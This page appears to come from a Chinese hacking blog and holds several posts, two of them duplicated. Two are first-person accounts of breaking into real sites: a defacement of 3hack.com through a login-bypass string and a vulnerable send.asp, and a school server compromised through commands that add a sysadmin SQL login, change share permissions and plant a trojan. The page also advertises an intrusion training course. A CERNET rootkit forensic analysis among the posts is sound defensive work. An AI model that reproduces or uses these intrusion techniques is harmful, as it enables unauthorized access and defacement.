乌克兰黑客入侵银行视频录像
[ 2009/02/14 14:47 | by selboo ]
Flash Player文件入侵华东黑客联盟装X的过程
[ 2008/10/10 13:41 | by selboo ]
文章作者:落叶纷飞[J.L.S.T] & 云中鹰[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
服务器应该防ARP,不过这还只是猜测
云中鸡说先不搞C段,PZ一下再说
然后我就打开了www.3hack.com
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~
然后阿拉伯黑客发现了www.3hack.com上有个xia的目录很可疑,于是我就去看看是什么
打开一看,
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
太帅了,真YD!!
这个页面应该是一套个人主页程序,而且还挺炫的!
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
经过半个多小时的摸索,还是没有发现可利用的地方。
这下郁闷了,不管了,把这套程序下载下来看看吧
找了一会才知道这套程序叫做“V时代个人flash主页”
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
于是马上打开http://www.3hack.com/xia/html/admin
返回的确实找不到页面,郁闷了,输入http://www.3hack.com/xia/html/
同样是找不到页面,真晕!再看看!
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
马上打开http://www.3hack.com/xia/asp/vshidai.mdb,我晕!服务器居然设置了mdb后缀映射,下载不了!
打开http://www.3hack.com/xia/asp/,发现返回空白,这下我真是服了!
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
过程如图5、6所示。
提交后我们打开www.3hack.com/xia/test.txt看看,如图7所示。
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
如果jian是经过request取值的话,同样也能搞到shell。
这次只是装到了X,并没有拿到shell
已经是凌晨了,跟云中J说了声就睡觉去鸟
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
就到这里吧,没技术含量,纯粹装X,高手们见笑了
另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
自己学不到技术,却还在自欺欺人
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
服务器应该防ARP,不过这还只是猜测
云中鸡说先不搞C段,PZ一下再说
然后我就打开了www.3hack.com
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~
然后阿拉伯黑客发现了www.3hack.com上有个xia的目录很可疑,于是我就去看看是什么
打开一看,
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
太帅了,真YD!!
这个页面应该是一套个人主页程序,而且还挺炫的!
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
经过半个多小时的摸索,还是没有发现可利用的地方。
这下郁闷了,不管了,把这套程序下载下来看看吧
找了一会才知道这套程序叫做“V时代个人flash主页”
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
于是马上打开http://www.3hack.com/xia/html/admin
返回的确实找不到页面,郁闷了,输入http://www.3hack.com/xia/html/
同样是找不到页面,真晕!再看看!
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
马上打开http://www.3hack.com/xia/asp/vshidai.mdb,我晕!服务器居然设置了mdb后缀映射,下载不了!
打开http://www.3hack.com/xia/asp/,发现返回空白,这下我真是服了!
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:
var a
var b
var tx
var clean
a=Request("re")
clean=Request("clean")
var jian="test.txt"
if(clean==1){
tx="&a="
var fs2
var fs2=Server.CreateObject("Scripting.FileSystemObject")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
newdt.WriteLine("&a=")
newdt.close()
}
if(clean==0|clean==1){
tx=""
var fso = Server.Createobject("Scripting.FileSystemObject")
var file = fso.OpenTextFile(Server.Mappath(jian))
while (!file.AtEndOfStream){
tx=file.ReadLine()
Response.write (tx)
}
Response.write ("&")
file.close()
}
if(clean==2){
tx=""
var fso = Server.Createobject("Scripting.FileSystemObject")
var file = fso.OpenTextFile(Server.Mappath(jian))
var fs2
var fs2=Server.CreateObject("Scripting.FileSystemObject")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)
while (!file.AtEndOfStream){
tx=file.ReadLine()
Response.write (tx)}
Response.write (a+"&")
newdt.WriteLine(a)
file.close()
newdt.close()
}
var b
var tx
var clean
a=Request("re")
clean=Request("clean")
var jian="test.txt"
if(clean==1){
tx="&a="
var fs2
var fs2=Server.CreateObject("Scripting.FileSystemObject")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
newdt.WriteLine("&a=")
newdt.close()
}
if(clean==0|clean==1){
tx=""
var fso = Server.Createobject("Scripting.FileSystemObject")
var file = fso.OpenTextFile(Server.Mappath(jian))
while (!file.AtEndOfStream){
tx=file.ReadLine()
Response.write (tx)
}
Response.write ("&")
file.close()
}
if(clean==2){
tx=""
var fso = Server.Createobject("Scripting.FileSystemObject")
var file = fso.OpenTextFile(Server.Mappath(jian))
var fs2
var fs2=Server.CreateObject("Scripting.FileSystemObject")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)
while (!file.AtEndOfStream){
tx=file.ReadLine()
Response.write (tx)}
Response.write (a+"&")
newdt.WriteLine(a)
file.close()
newdt.close()
}
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
过程如图5、6所示。
提交后我们打开www.3hack.com/xia/test.txt看看,如图7所示。
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
如果jian是经过request取值的话,同样也能搞到shell。
这次只是装到了X,并没有拿到shell
已经是凌晨了,跟云中J说了声就睡觉去鸟
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
就到这里吧,没技术含量,纯粹装X,高手们见笑了
另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
自己学不到技术,却还在自欺欺人
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
linux系统下的入侵分析案例
[ 2008/09/16 10:51 | by selboo ]
受到攻击
最近,某校校园网管理员接到国外用户投诉,说该校园网中的一台视频服务器正在对外进行非法的TCP 443端口扫描。该视频服务器的地址是192.168.1.10,操作系统为redhat7.3,对外开放端口为TCP 22、80、443。然而,管理员在机器上经过重重仔细检查,未观察到任何异常。在此情况下,我们接受请求帮助他们检查机器。
初步检测
我们首先在交换机上对该服务器的网络流量进行了镜像,发现该主机确实存在对外443端口的扫描流量,但是登录到系统上使用netstat -an命令却看不到任何与443端口相关的网络连接,使用psef命令也没有看到系统中有任何可疑的进程。因此,我们怀疑系统中可能被安装了 rootkit(注1)。为了证实这一点,我们将系统中的ps命令拷贝到另外一台可信的操作系统版本相同的机器上(当然如果你在系统安装初始就维护了一张系统命令md5值表的话,那么你现在只需从别的地方拷一个md5sum程序过来就可以),使用md5sum命令对两个ps进行比对发现192.168.1.10上的ps已经被人修改过,因此可以断定系统确实是被入侵并安装了rootkit级的后门程序。
脱机分析
既然系统命令已经被替换,那么在该系统上所做的任何操作都是不可信的,因此接下来我们将被入侵服务器关闭并取下硬盘挂到另外一台主机上面进行分析。我们首先查找系统中可疑的登录记录,使用如下命令:
more /var/log/secure |grep Accepted (注2)
我们对系统的登录日志进行了查看,在排除了管理员自己的登录记录后,下面这条记录引起了我们怀疑:
Jul 3 14:01:01 vsp-thu sshd[14042]: Accepted password for news from 82.77.188.56 port 1143 ssh2
这条记录显示在7月3号的下午14:01:01秒,有人使用news账号从82.77.188.56成功登录了系统,经查,82.77.188.56是一个罗马尼亚的地址。根据对方直接使用news账号登录这一点来看,对方攻击成功的时间应该早于7月3号14点,因为系统默认情况下news账号是内置账号没有密码并无法登录,但是我们查看/etc/shadow文件却发现如下记录:
news1$ChmaBoHa$ha.JnyJkIryk5wc5DeWzR1:12967:0:99999:7:::
这说明news账号被入侵者加设了密码,并改成了可以远程登录的账号,之所以做这样的修改,一般是入侵者想留下一个隐藏的登录账号,方便日后登录。我们继续检查系统的其他日志却再没发现任何可疑的纪录,很显然入侵者已经对系统的日志文件进行了修改。
继续深入
线索到这里似乎中断。而我们所知道的仅仅是入侵者可能来自罗马尼亚,他修改了系统的news账号权限,并篡改了系统日志。这些已知信息看起来对整个事件的处理并没有太大的帮助。但是我们有一个很有用的信息,就是攻击发生的大概时间可以定位在7月3号下午2点左右,有了这个时间我们就可以使用find命令来查找出这个时间段里面系统中被修改的文件有哪些?命令格式如下:
Find / -ctime +nprint 〉find.log (注3)
在输出的结果中我们发现入侵者在/var/opt下建了一个名为. (点后面是一个空格字符)(注4)的目录,而该目录下包含表1中所显示子目录和文件。
对这些程序进行分析后,知道其功能如下:
表1 入侵者在/var/opt下建立的名为.的目录
1、z程序是用来清除系统日志中相关信息的,例如:
./z 82.77.188.56这条命令执行后,系统中所有与82.77.188.56这个地址有关的日志信息全部会被清除掉;
2、cata目录下是一个IRC的后门程序,运行后系统会自动连接到以下4个IRC服务器,然后入侵者只要登录相应的IRC聊天室就能向这台机器发送控制指令,4个IRC聊天室服务器地址为:
server 194.134.7.195 6662
server 195.197.175.21 7000
server 161.53.178.240 6667
server 66.198.160.2 8080;
3、login程序是用来替换系统登录进程的木马程序,可以记录登录账号和密码;
4、kaka目录里放置的是用来替换系统命令的相应程序,就是这个目录里的程序使得我们在系统上看不出有任何异常;
5、atp 目录下放置的是专门用来扫描https服务和攻击openssl的程序,国外发过来的443端口的扫描投诉就是因为这个目录里的openssl-too程序引起的。这个攻击程序是2005年4月19号被公布出来的,利用的是编号为CAN-2002-0656的openssl程序的漏洞;
另外,在7月3号被入侵者修改的文件还包括以下两个:
/etc/httpd/conf/httpd.conf(注5)
/etc/httpd/logs/ssl_request_log(注6)
由此可见:
1、入侵者修改了httpd.conf文件,注销了httpd.conf的443端口(跟管理员确认了不是他们自己注销的),大概是不想漏洞被其他人利用;
2、入侵者删除了ssl_request_log日志中的7月3号中午12点到14点的所有纪录(因为ssl_request_log并不算系统日志,所以不能用z程序直接清除,入侵者只能手动删除相应时间段的日志记录)。
继续检查相应日志我们又发现在root目录下的.bash_history(注7)文件中有如下一条命令纪录:./z 82.77.188.240
揭开谜团
有了上面这些信息,我们就可以对本次入侵事件做出如下分析:
1、入侵时间:从目录生成时间和入侵者删除ssl_request_log日志中相应时间段记录的情况来看入侵的大概时间应该在7月3号中午13点左右;
2、利用的漏洞:利用漏洞扫描程序对系统进行扫描发现系统中存在多个可被利用的漏洞,但是从入侵者关闭apache的443端口服务和修改 ssl_request_log日志文件来看,他利用的是apache的mod_ssl模块的漏洞(CAN-2002-0656)入侵系统的;
3、攻击地址来源:攻击地址来源有两个为82.77.188.56和82.77.188.240(但是这两个地址很有可能也是被入侵者控制的机器);
4、入侵者进入系统后做了以下这些操作:
在系统中安装了通过IRC聊天服务器控制的后门程序修改了系统中news账号的权限和密码;
替换系统中一系列的系统命令;
替换了系统本身的login程序,并获得root的密码(注8);
利用攻击程序对外进行443端口的扫描与攻击;
使用清除程序清除了系统日志中的相关记录。
解决办法
由于系统内核级的程序已经被替换,我们建议用户备份所需数据后重新安装系统,并执行以下操作:
1、安装更高版本的操作系统;
2、安装相应的系统补丁程序;
3、修改系统管理员的密码,并检查同网段内其他使用相同密码的主机。(因为入侵者已经通过木马程序获得了管理员的口令);
4、安装更高版本的apache程序,并关闭不必要服务端口;
5、使用防火墙限制ssh 22端口的登录来源地址。
(作者单位为CERNET应急响应组)
注释
注1:简单点说rootkit就是一种黑客的工具包,它里面通常包括:修改过的系统命令程序、后门程序、攻击程序、日志清除程序等,黑客使用rootkit程序就是为了在被入侵的主机上隐藏自己的攻击行为。
注2:/var/log/secure 记录了系统账号的登录信息,而grep Accepted可以有效地过滤掉那些不成功的登录记录。
注3:这个命令的意思就是查找“/”目录下的所有n天前被修改过的文件,使用>管道符是为了将查询结果输出到find.log文件中,便于后面的分析。
注4:linux系统中以“.”开头的文件和目录都隐藏文件,需要使用ls -al命令才能查看到,而点后面加空格的目录名字很容易在ls -al显示结果中被我们忽略过去)
注5:httpd.conf是apche程序的主配置文件,在这个文件里注释掉443端口,将导致apche无法正常提供443端口的https服务。
注6:ssl_request_log文件是apache的一个日志文件,它记录着用户基于https协议的访问信息。
注7:默认情况下各相应用户主目录下的.bash_history文件记录保存着500条该用户在系统中曾经执行过的操作命令。
注8:既然入侵者已经使用了清除程序清除了系统日志,为什么还在root的.bash_history中留下了./z 82.77.188.240命令的记录呢?这就要从.bash_history的记录机制说起了,用户每次登录系统后所做的任何操作并不会直接就存储到了.bash_history文件中,而是保存在一个变量中,只有当用户退出登录以后,这个变量的值才会被写入到.bash_history文件中。这就说明入侵者最后一次是通过82.77.188.240这个地址使用root账号登录系统的,他在运行./z 82.77.188.240这个命令时./bash_history中还没有这条记录,所以也没有被清除,当他退出系统后,变量中的./z 82.77.188.240就被写入到.bash_history中了。因此我们可以断定入侵者已经通过假冒的login程序获得了root的密码。 W020061215331557713921.gif (12.75 KB)
最近,某校校园网管理员接到国外用户投诉,说该校园网中的一台视频服务器正在对外进行非法的TCP 443端口扫描。该视频服务器的地址是192.168.1.10,操作系统为redhat7.3,对外开放端口为TCP 22、80、443。然而,管理员在机器上经过重重仔细检查,未观察到任何异常。在此情况下,我们接受请求帮助他们检查机器。
初步检测
我们首先在交换机上对该服务器的网络流量进行了镜像,发现该主机确实存在对外443端口的扫描流量,但是登录到系统上使用netstat -an命令却看不到任何与443端口相关的网络连接,使用psef命令也没有看到系统中有任何可疑的进程。因此,我们怀疑系统中可能被安装了 rootkit(注1)。为了证实这一点,我们将系统中的ps命令拷贝到另外一台可信的操作系统版本相同的机器上(当然如果你在系统安装初始就维护了一张系统命令md5值表的话,那么你现在只需从别的地方拷一个md5sum程序过来就可以),使用md5sum命令对两个ps进行比对发现192.168.1.10上的ps已经被人修改过,因此可以断定系统确实是被入侵并安装了rootkit级的后门程序。
脱机分析
既然系统命令已经被替换,那么在该系统上所做的任何操作都是不可信的,因此接下来我们将被入侵服务器关闭并取下硬盘挂到另外一台主机上面进行分析。我们首先查找系统中可疑的登录记录,使用如下命令:
more /var/log/secure |grep Accepted (注2)
我们对系统的登录日志进行了查看,在排除了管理员自己的登录记录后,下面这条记录引起了我们怀疑:
Jul 3 14:01:01 vsp-thu sshd[14042]: Accepted password for news from 82.77.188.56 port 1143 ssh2
这条记录显示在7月3号的下午14:01:01秒,有人使用news账号从82.77.188.56成功登录了系统,经查,82.77.188.56是一个罗马尼亚的地址。根据对方直接使用news账号登录这一点来看,对方攻击成功的时间应该早于7月3号14点,因为系统默认情况下news账号是内置账号没有密码并无法登录,但是我们查看/etc/shadow文件却发现如下记录:
news1$ChmaBoHa$ha.JnyJkIryk5wc5DeWzR1:12967:0:99999:7:::
这说明news账号被入侵者加设了密码,并改成了可以远程登录的账号,之所以做这样的修改,一般是入侵者想留下一个隐藏的登录账号,方便日后登录。我们继续检查系统的其他日志却再没发现任何可疑的纪录,很显然入侵者已经对系统的日志文件进行了修改。
继续深入
线索到这里似乎中断。而我们所知道的仅仅是入侵者可能来自罗马尼亚,他修改了系统的news账号权限,并篡改了系统日志。这些已知信息看起来对整个事件的处理并没有太大的帮助。但是我们有一个很有用的信息,就是攻击发生的大概时间可以定位在7月3号下午2点左右,有了这个时间我们就可以使用find命令来查找出这个时间段里面系统中被修改的文件有哪些?命令格式如下:
Find / -ctime +nprint 〉find.log (注3)
在输出的结果中我们发现入侵者在/var/opt下建了一个名为. (点后面是一个空格字符)(注4)的目录,而该目录下包含表1中所显示子目录和文件。
对这些程序进行分析后,知道其功能如下:
表1 入侵者在/var/opt下建立的名为.的目录
1、z程序是用来清除系统日志中相关信息的,例如:
./z 82.77.188.56这条命令执行后,系统中所有与82.77.188.56这个地址有关的日志信息全部会被清除掉;
2、cata目录下是一个IRC的后门程序,运行后系统会自动连接到以下4个IRC服务器,然后入侵者只要登录相应的IRC聊天室就能向这台机器发送控制指令,4个IRC聊天室服务器地址为:
server 194.134.7.195 6662
server 195.197.175.21 7000
server 161.53.178.240 6667
server 66.198.160.2 8080;
3、login程序是用来替换系统登录进程的木马程序,可以记录登录账号和密码;
4、kaka目录里放置的是用来替换系统命令的相应程序,就是这个目录里的程序使得我们在系统上看不出有任何异常;
5、atp 目录下放置的是专门用来扫描https服务和攻击openssl的程序,国外发过来的443端口的扫描投诉就是因为这个目录里的openssl-too程序引起的。这个攻击程序是2005年4月19号被公布出来的,利用的是编号为CAN-2002-0656的openssl程序的漏洞;
另外,在7月3号被入侵者修改的文件还包括以下两个:
/etc/httpd/conf/httpd.conf(注5)
/etc/httpd/logs/ssl_request_log(注6)
由此可见:
1、入侵者修改了httpd.conf文件,注销了httpd.conf的443端口(跟管理员确认了不是他们自己注销的),大概是不想漏洞被其他人利用;
2、入侵者删除了ssl_request_log日志中的7月3号中午12点到14点的所有纪录(因为ssl_request_log并不算系统日志,所以不能用z程序直接清除,入侵者只能手动删除相应时间段的日志记录)。
继续检查相应日志我们又发现在root目录下的.bash_history(注7)文件中有如下一条命令纪录:./z 82.77.188.240
揭开谜团
有了上面这些信息,我们就可以对本次入侵事件做出如下分析:
1、入侵时间:从目录生成时间和入侵者删除ssl_request_log日志中相应时间段记录的情况来看入侵的大概时间应该在7月3号中午13点左右;
2、利用的漏洞:利用漏洞扫描程序对系统进行扫描发现系统中存在多个可被利用的漏洞,但是从入侵者关闭apache的443端口服务和修改 ssl_request_log日志文件来看,他利用的是apache的mod_ssl模块的漏洞(CAN-2002-0656)入侵系统的;
3、攻击地址来源:攻击地址来源有两个为82.77.188.56和82.77.188.240(但是这两个地址很有可能也是被入侵者控制的机器);
4、入侵者进入系统后做了以下这些操作:
在系统中安装了通过IRC聊天服务器控制的后门程序修改了系统中news账号的权限和密码;
替换系统中一系列的系统命令;
替换了系统本身的login程序,并获得root的密码(注8);
利用攻击程序对外进行443端口的扫描与攻击;
使用清除程序清除了系统日志中的相关记录。
解决办法
由于系统内核级的程序已经被替换,我们建议用户备份所需数据后重新安装系统,并执行以下操作:
1、安装更高版本的操作系统;
2、安装相应的系统补丁程序;
3、修改系统管理员的密码,并检查同网段内其他使用相同密码的主机。(因为入侵者已经通过木马程序获得了管理员的口令);
4、安装更高版本的apache程序,并关闭不必要服务端口;
5、使用防火墙限制ssh 22端口的登录来源地址。
(作者单位为CERNET应急响应组)
注释
注1:简单点说rootkit就是一种黑客的工具包,它里面通常包括:修改过的系统命令程序、后门程序、攻击程序、日志清除程序等,黑客使用rootkit程序就是为了在被入侵的主机上隐藏自己的攻击行为。
注2:/var/log/secure 记录了系统账号的登录信息,而grep Accepted可以有效地过滤掉那些不成功的登录记录。
注3:这个命令的意思就是查找“/”目录下的所有n天前被修改过的文件,使用>管道符是为了将查询结果输出到find.log文件中,便于后面的分析。
注4:linux系统中以“.”开头的文件和目录都隐藏文件,需要使用ls -al命令才能查看到,而点后面加空格的目录名字很容易在ls -al显示结果中被我们忽略过去)
注5:httpd.conf是apche程序的主配置文件,在这个文件里注释掉443端口,将导致apche无法正常提供443端口的https服务。
注6:ssl_request_log文件是apache的一个日志文件,它记录着用户基于https协议的访问信息。
注7:默认情况下各相应用户主目录下的.bash_history文件记录保存着500条该用户在系统中曾经执行过的操作命令。
注8:既然入侵者已经使用了清除程序清除了系统日志,为什么还在root的.bash_history中留下了./z 82.77.188.240命令的记录呢?这就要从.bash_history的记录机制说起了,用户每次登录系统后所做的任何操作并不会直接就存储到了.bash_history文件中,而是保存在一个变量中,只有当用户退出登录以后,这个变量的值才会被写入到.bash_history文件中。这就说明入侵者最后一次是通过82.77.188.240这个地址使用root账号登录系统的,他在运行./z 82.77.188.240这个命令时./bash_history中还没有这条记录,所以也没有被清除,当他退出系统后,变量中的./z 82.77.188.240就被写入到.bash_history中了。因此我们可以断定入侵者已经通过假冒的login程序获得了root的密码。 W020061215331557713921.gif (12.75 KB)
黑吧web入侵班VIP培训教程
[ 2008/09/11 10:52 | by selboo ]
几种常见的注入工具综合使用的介绍5
实例分析SQL手工注入一般步骤
简单介绍下常用SQL注入函数和中文处理方法
讲解SA权限的入侵思路
实战SA权限入侵韩国站点(实例1).
实战SA之一句话木马入侵(实例2)
OSA权限中Mt.exe的使用及其它入侵思路
深度剖析差异备份
实例讲解差异备份入侵韩国网站(实例
深度剖析Log备份
用工具备份入侵国外站点(实例)
手工备份入侵国外网站(实例)
抓包改包的详解(实例)
对上传漏洞的总结及论坛固定漏洞入侵(实例)
对SQL注入的完全总结侵的完全总结
批量定点入侵各国网站(实例)
旁注入侵思路及条件
暴库原理剖析 实例暴库入侵学校网站(实例)
数据库与一句话木马的完美结合(实例)
数据库与社会工程学的完美结合(实例)
欺骗在实例中的应用(实例)
详解上传漏洞原理
利用上传漏洞简单批量得WebSHell(实例)
实例讲解入侵国外网站(实例)
补充并总结实例讲解入侵国外网站
浅谈注入入侵的思路
对遇DB权限时的思考及备份原理剖析
对SA权限上传的补充
浅谈网站入侵的常用方法和一般思路
第1下载地址:
http://down.cmbfree.com/h8jb-z@hdhecmbfree.com.rar
入侵新技巧-CMD下加Sql账号
[ 2008/08/18 13:10 | by selboo ]
这个服务器可以用sql溢出,可惜就是找不到进一步的入侵方法,因而一直也没有拿下来。今天在校盟看到一篇文章,说是在cmd下也可以中入sql账号和密码,方法如下:
echo exec master.dbo.sp_addlogin ’rooto’,’******’ >test.qry
echo exec sp_addsrvrolemember ’rooto’,’sysadmin’ >>test.qry
cmd.exe /c isql -E /U alma /P /i c:\test.qry
看完后立马去试了一下,居然真的成功了,可是由于溢出,服务器的sql服务已经停止,只好等它下次启动时再运行了。不过对我来说,这种加sql账号的方法还是第一次,所以得拿出来记一下,以备以后还有能用得着的时候,呵呵。
关于后面的也就不说了,大体上都是以前的老方法了,虽然我现在还没有进一步,但估计已在我手中了。
上次写到哪儿就没写了,这次还是想写点东西的。
上次说入侵这个还挺简单,可是我在后来的入侵过程中,发现并不是那么简单,加了sql账号,以后可以有系统权限了,没想到进去一看,发现删了xplog70.dll和cmdshell,奶奶的,下面如果再入侵就难多了,到邪八发帖,居然没通过,一直发不出来,到火狐去发帖,几天都没有回,看来还是得自己搞定了。
这样一直过了几天,后来我在我的硬盘里找啊找,发现了一个nocmdshell执得命令的工具,一看是幻影的人写的,妈妈的,刺还的队伍还真不错,写的工具也牛B。打开工具试了下,发现真的成功了,可以加账号和执行命令,不过我试了tftp和echo都不行,看来还是有一些问题。虽然可以执行命令了,但还不能将我的木马传上去,这跟我以前的SQL溢出的权限还是一样的,还丢了ehco命令,以前还可以echo的,到底如何是好呢,问了几个朋友,都没有得到我想要的答案。
后来习惯的输入"net share"看了一下,吓死,姐姐的,看到了IPC$,这个我以前很少玩过,没想到今天遇到了,立马到网上找了相关的IPC$入侵资料。照着资料弄,可是还是不行,原来主机上就只有一个ipc$共享和一个cdbook_tem的共享,于是加了在cmd下加了一个共享"net share rooto=c:\",然后在IPC$里输入copy update.exe \\*****\rooto,响响的按下了回车,带着微笑的...
下面让我看到的一幕真让我伤心:“拒绝访问...已复掉0个文件",晕死哦,奶奶的,不是加了共享了吗,还不让我上传,真BT。于是转到D盘,看到一个temp文件是空的,于是将它设为共享,并设入everyone共享,谁知又出错,没有权限,没想到管理员这么强啊,这还真让我感到有挑战性了。不信就搞不定你,于是我又来到E盘,看到一个Bak的文件夹,进去一看,发现是空的,这个应该有写权限吧,将它设为共享,再copy,可还是
不行,将为共享吧,命令如下:
cacls d:\website /g everyone:f /e /t 授予此用户对该目录的完全控制权限
cacls d:\website /r everyone /e /t 取消其它用户对此目录的访问权限
我是没想着可以成功的,可谁知他奶的成功了,后来一阵狂喜。呵呵。
机不可失,失不再来,立马上传了木马文件,运行了一下,看到Radmin可以连接了,我心想,这才算是成功了啊。呵呵。
后来用Radmin连接它的盘时发现D盘是一个光盘,汗死,光盘也长期挂在电脑上,真是服了学校这帮玩意们。我还以为真是它BT呢,原来是这样啊。
这个服务器的入侵就到此结束了,近期也在与学校一位老师Q聊着,关于学校SQL溢出的严重漏洞已不可小视了,我已将补丁地址发给他们了,希望他们能及时打上补丁。
